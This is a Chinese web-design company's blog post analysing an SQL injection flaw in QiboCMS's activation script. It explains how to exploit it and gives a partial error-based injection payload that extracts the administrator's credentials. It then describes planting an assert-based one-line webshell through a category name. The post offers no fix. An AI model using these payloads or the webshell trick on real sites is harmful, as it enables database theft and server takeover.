昆明建站派旨在为互联网中小企业创造实际价值!

 

齐博cms爆SQL注入Bug,漏洞可远程执行代码提权

时间:2018-10-27浏览:25昆明建站派

记得多年前就使用过齐博CMS系统,熟悉的朋友应该知道是一款主打地方生活的门户系统,也是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢。开发架构使用的是php语言以及mysql数据库,强大的网站并发能力。于近日又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何利用。


在对整个网站代码的漏洞检测中发现do目录下的activate.php存在可以插入恶意参数的变量值,我们来看下这个代码:


齐博cms爆SQL注入Bug,漏洞可远程执行代码提权


齐博cms漏洞详情:


从代码里发现这个代码的功能是发送序列号激活的一个功能,从激活的链接地址里,可以看出do/activate.php?job=activate&safe_id=$safe_id 是用来激活序列号的,我们从整个齐博的代码里找到了账号激活的一个大体的过程,首先会注册一个账号,注册账号后会需要发送邮件到用户的邮箱里,邮箱里验证的是safe_id这个值,这个safe_id这个值经过md5的解密后直接生成uaername跟用户的密码,然后再传入到get_safe()这个函数,在这个inc文件夹下的class.user.php代码里找得到这个函数。


我们发现这个get_safe()函数是用来传递用户的激活信息,并进行安全过滤与判断的,从这里我们可以插入恶意的sql语句到网站后端里去,并直接到数据库中执行该语句,我们本地来测试一下是否可以sql注入:


齐博cms爆SQL注入Bug,漏洞可远程执行代码提权


从上图我们可以看出可以进行网站sql注入攻击,那么我们就可以进行查询数据库的账号密码操作,比如查询网站超级管理员的账号密码:and (updatexml(1,concat(0x7e,(substring((selectusername from qb_memberdata where groupid=3),1, 这个语句就是查询超级管理员的账号密码,通过这里我们查到网站的管理员账号密码,登录后台,我们进行远程代码提权了。


齐博cms爆SQL注入Bug,漏洞可远程执行代码提权


增加栏目为${assert($_POST[safe])},一句话后门的代码会直接写入到/data/guide_fid.php文件,用一句话木马连接工具连接即可。

昆明建站派以专业严谨的态度承接网站制作,以热情诚信的态度服务客户,我们专业提供商城网站建设、营销型网站建设、手机网站建设、按需定制网站开发、网站优化、营销策划等基于互联网的服务。

 

经典案例

Classic Case

鲜花电商订单管理系统定制版

鲜花电商订单管理系统定制版

花相伴鲜花店

花相伴鲜花店

花仙网

花仙网

花仙鲜花店

花仙鲜花店

 
最近更新
热门文章
  • 服务热线:15969463961
  • 咨询邮箱:806920018@qq.com
  • 项目经理:黄先生